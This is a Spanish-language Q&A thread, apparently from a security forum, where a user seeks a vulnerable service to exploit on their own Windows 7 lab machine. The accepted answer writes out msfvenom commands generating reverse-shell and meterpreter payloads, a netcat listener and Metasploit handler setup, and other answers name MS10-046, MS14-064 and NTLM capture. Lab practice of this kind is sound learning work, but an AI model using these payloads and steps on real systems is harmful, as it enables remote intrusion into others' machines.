Instale un servicio vulnerable para Windows 7

3

Tengo algún tipo de proyecto o demostración, donde tengo que explotar Windows 7 para obtener un shell remoto.

Realicé un análisis de vulnerabilidad con nessus en mi máquina con Windows 7, pero no encontré ningún tipo de vulnerabilidad que me permita alcanzar mi objetivo.

Entonces, ¿hay algún servicio vulnerable que contenga un búfer sobre flujo que pueda instalar en mi máquina con Windows 7, y usarlo para explotar esa máquina de forma remota con metasploit?

Más información:

  • La máquina que estoy tratando de explotar es mía, por lo que todo es legal.

  • Estoy usando Ubuntu 15.10 con la última versión de metasploit (lo instalé desde los repositorios de Kali).

pregunta Sidahmed 31.03.2016 - 16:33
fuente

3 respuestas

0

Utilicé esta vulnerabilidad vulnerabilidad (@halfinformed me la proporcionó en los comentarios).

Así que aquí están los pasos para instalar y explotar con un simple shell inverso:

  1. Instale el servicio vulnerable desde el enlace dado arriba.
  2. Genere una nueva carga útil que se ajuste a sus necesidades (dependiendo de su dirección IP) con este comando msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python .
  3. Reemplace la carga útil en el script de explotación con la carga útil generada por el comando anterior (de la línea 23 a la línea 55).
  4. Reemplace la dirección IP de la víctima en la secuencia de comandos de explotación (línea 61).
  5. Escuche con netcat en otro terminal con el comando nc -nlpv 4444 .
  6. Inicie el script de explotación con python path_to_exlpoit_script.py .
  7. Vaya al terminal donde lanzó nc, encontrará un shell inverso esperándole.

Si no va a explotar con la carga útil de meterpreter, necesita cambiar los pasos 2 y 5:

  1. Genere la carga útil de meterpreter que se ajuste a sus necesidades con este comando msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python .

  2. Escuche con meterpreter en otra terminal. Para hacerlo, abre metasploit y escribe use exploit/multi/handler ; entonces set payload windows/meterpreter/reverse_tcp ; entonces set lhost your_ip_address ; entonces set lport 4444 ; finalmente exploit .

respondido por el Sidahmed 07.05.2016 - 10:46
fuente
2

Suponiendo que la máquina con Windows 7 no necesita estar completamente parchada / actualizada, puede mirar la ejecución de una copia de vainilla (sin actualizaciones aplicadas) de Windows 7 con el Control de cuentas de usuario (UAC) deshabilitado y explotar MS10 -046.

MS10-046 es una vulnerabilidad crítica que podría permitir a un posible atacante obtener el mismo nivel de derechos de usuario que el usuario local (donde la mayoría de los empleados usan una cuenta con privilegios de administrador). La vulnerabilidad afecta tanto a las versiones de 32 bits como a las de 64 bits de Windows 7.

El exploit se relaciona con el manejo de archivos .LNK que tiene el recurso de icono que apunta a un archivo malicioso de biblioteca de enlace dinámico (DLL).

Sin saber explícitamente si necesita ser una vulnerabilidad de desbordamiento de búfer, diría que esto debería funcionar, o de manera similar, podría usar una distribución como Metasploitable que se deja intencionalmente vulnerable.

    
respondido por el 1ntgr 31.03.2016 - 17:14
fuente
0

Hay varias vulnerabilidades disponibles (como MS14-064) para Windows 7 a 8 y quizás 10. No todas serán aplicables como se menciona en @ 1ntgr

Puedes buscarlos aquí: enlace

Si lo desea, puede apuntar a los programas instalados en la máquina. Consulte enlace

De lo contrario, siempre podría probar la famosa captura SMB / NTLM engañando a la víctima para que acceda a su servidor de destino.

PS: No podría agregar más de 2 enlaces aquí, pero siéntete libre de enviarme un DM @haxorhead.

    
respondido por el gremlin0x00 01.04.2016 - 06:00
fuente

Lea otras preguntas en las etiquetas